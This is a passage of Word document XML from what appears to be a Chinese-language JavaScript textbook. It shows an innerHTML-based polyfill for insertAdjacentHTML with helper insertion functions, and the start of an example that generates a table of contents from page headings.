      <w:r>
        <w:t>15-6</w:t>
      </w:r>
      <w:r>
        <w:t>：使用</w:t>
      </w:r>
      <w:r>
        <w:t>innerHTML</w:t>
      </w:r>
      <w:r>
        <w:t>实现</w:t>
      </w:r>
      <w:r>
        <w:t>insertAdjacentHTML()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>本模块为不支持它的浏览器定义了</w:t>
      </w:r>
      <w:r>
        <w:t>Element.insertAdjacentHTML</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>还定义了一些可移植的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>插入函数，它们的名字比</w:t>
      </w:r>
      <w:r>
        <w:t>insertAdjacentHTML</w:t>
      </w:r>
      <w:r>
        <w:t>更符合逻辑：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//Insert.before()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Insert.after()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Insert.atStart()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Insert.atEnd()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var Insert=(func</w:t>
      </w:r>
      <w:r>
        <w:t>tion(){//</w:t>
      </w:r>
      <w:r>
        <w:t>如果元素有原生的</w:t>
      </w:r>
      <w:r>
        <w:t>insertAdjacentHTML</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个函数名更明了的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>插入函数中使用它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(document.createElement("div").insertAdjacentHTML){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>before:function(e,h){e.insertAdjacentHTML("beforebegin",h);},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>after:function(e,h){e.insertAdjacentHTML("afterend",h);},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>atStart:func</w:t>
      </w:r>
      <w:r>
        <w:t>tion(e,h){e.insertAdjacentHTML("afterbegin",h);},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>atEnd:function(e,h){e.insertAdjacentHTML("beforeend",h);}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>否则，无原生的</w:t>
      </w:r>
      <w:r>
        <w:t>insertAdjacentHTML</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>实现同样的</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个插入函数，并使用它们来定义</w:t>
      </w:r>
      <w:r>
        <w:t>insertAdjacentHTML</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>首先，定义一个工具函数，传入</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>字符串，返回一个</w:t>
      </w:r>
      <w:r>
        <w:t>DocumentFragment</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>它包含了解析后的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>的表示</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">function </w:t>
      </w:r>
      <w:r>
        <w:t>fragment(html){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>var elt=document.createElement("div");//</w:t>
      </w:r>
      <w:r>
        <w:t>创建空元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var frag=document.createDocumentFragment();//</w:t>
      </w:r>
      <w:r>
        <w:t>创建空文档片段</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>elt.innerHTML=html;//</w:t>
      </w:r>
      <w:r>
        <w:t>设置元素内容</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>while(elt.firstChild)//</w:t>
      </w:r>
      <w:r>
        <w:t>移动所有的节点</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>frag.appendChild(elt.firstChild);//</w:t>
      </w:r>
      <w:r>
        <w:t>从</w:t>
      </w:r>
      <w:r>
        <w:t>elt</w:t>
      </w:r>
      <w:r>
        <w:t>到</w:t>
      </w:r>
      <w:r>
        <w:t>frag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return frag;//</w:t>
      </w:r>
      <w:r>
        <w:t>然后返回</w:t>
      </w:r>
      <w:r>
        <w:t>frag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var Insert={</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>before:function(elt,html){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>elt.parentNode.insertBefore(fragment(html),elt);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>after:function(elt,html){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>elt.parentNode.insertBefore(fragment(html),elt.nextSibling);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>atStart:function(elt,html){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>elt.insertBefore(fragment(html),elt.firstChild);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>atEnd:</w:t>
      </w:r>
      <w:r>
        <w:t>function(elt,html){elt.appendChild(fragment(html));}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>基于以上函数实现</w:t>
      </w:r>
      <w:r>
        <w:t>insertAdjacentHTML</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Element.prototype.insertAdjacentHTML=function(pos,html){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>switch(pos.toLowerCase()){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>case"beforebegin":return Insert.before(this,html);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>case"afterend":return Insert.after(th</w:t>
      </w:r>
      <w:r>
        <w:t>is,html);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>case"afterbegin":return Insert.atStart(this,html);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>case"beforeend":return Insert.atEnd(this,html);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return Insert;//</w:t>
      </w:r>
      <w:r>
        <w:t>最后返回</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个插入函数</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378" w:name="15_7_Li_Zi__Sheng_Cheng_Mu_Lu_Biao_"/>
      <w:r>
        <w:t>15.7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　例子：生成目录表</w:t>
      </w:r>
      <w:bookmarkEnd w:id="378"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>15-7</w:t>
      </w:r>
      <w:r>
        <w:t>说明了如何为文档动态地创建一个目录表。它展示了上一节所描述的文档脚本化的很多概念：元素选取、文档遍历、元素</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>属性设置、</w:t>
      </w:r>
      <w:r>
        <w:t>innerHTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性设置和在文档中创建与插入新节点等。本例注释详尽，理解代码应该不会有问题。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>15-7</w:t>
      </w:r>
      <w:r>
        <w:t>：一个自动生成的目录表</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>/**</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>这个模块注册一个可在页面加载完成后自动运行的匿名函数。当执行这个函数时会去文档中查找</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*id</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>"TOC"</w:t>
      </w:r>
      <w:r>
        <w:t>的元素。如果这个元素不存在，就创建一个元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>生成的</w:t>
      </w:r>
      <w:r>
        <w:t>TOC</w:t>
      </w:r>
      <w:r>
        <w:t>目录应当具有自己的</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>样式。整个目录区域的样式</w:t>
      </w:r>
      <w:r>
        <w:t>className</w:t>
      </w:r>
      <w:r>
        <w:t>设置为</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>TOCEntry"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>同样我们为不同层级的目录标题定义不同的样式。＜</w:t>
      </w:r>
      <w:r>
        <w:t>h1</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签生成的标题</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*className</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>"TOCLevel1"</w:t>
      </w:r>
      <w:r>
        <w:t>，＜</w:t>
      </w:r>
      <w:r>
        <w:t>h2</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签生成的标题</w:t>
      </w:r>
      <w:r>
        <w:t>className</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>"TOCLevel2"</w:t>
      </w:r>
      <w:r>
        <w:t>，以此类推</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>段编号的样式为</w:t>
      </w:r>
      <w:r>
        <w:t>"TOCSectNum"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>完整的</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>样式代码如下</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*#TOC{border:solid black 1px;margin:10px;padding:10px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*.TOCEntry{font-family:sans-serif;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*.TOCEntry a{text-</w:t>
      </w:r>
      <w:r>
        <w:t>decoration:none;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*.TOCLevel1{font-size:16pt;font-weight:bold;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*.TOCLevel2{font-size:12pt;margin-left:.5in;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*.TOCSectNum:after{content:":";}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>这段代码的最后一行表示每个段编号之后都有一个冒号和空格符。要想隐藏段编号，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>请使用这行代码：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*.TOCSectNum{display:none}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>这个模块需要</w:t>
      </w:r>
      <w:r>
        <w:t>onLoad()</w:t>
      </w:r>
      <w:r>
        <w:t>工具函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>**/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>onLoad(function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>匿名函数定义了一个局部作用域</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>查找</w:t>
      </w:r>
      <w:r>
        <w:t>TOC</w:t>
      </w:r>
      <w:r>
        <w:t>容器元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果不存在，则在文档开头处创建一个</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var toc=document.getElementById("TOC");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>if(!toc){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>toc=document.createElement("div");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>toc.id="TOC";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.body.insertBefore(toc,document.body.firstChild);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>查找所有的标题元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var headings;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(d</w:t>
      </w:r>
      <w:r>
        <w:t>ocument.querySelectorAll)//</w:t>
      </w:r>
      <w:r>
        <w:t>我们是否能用这个简单的方法？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>headings=document.querySelectorAll("h1,h2,h3,h4,h5,h6");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else//</w:t>
      </w:r>
      <w:r>
        <w:t>否则，查找方法稍微麻烦一些</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>headings=findHeadings(document.body,[]);//</w:t>
      </w:r>
      <w:r>
        <w:t>递归遍历</w:t>
      </w:r>
      <w:r>
        <w:t>document</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>body</w:t>
      </w:r>
      <w:r>
        <w:t>，查找标题元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function findHeadings(root,sects){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var c=root.firstChild;c!=null;c</w:t>
      </w:r>
      <w:r>
        <w:t>=c.nextSibling){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(c.nodeType!==1)continue;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(c.tagName.length==2</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>c.tagName.charAt(0)=="H")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>sects.push(c);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>findHeadings(c,sects);</w:t>
      </w:r>
    </w:p>
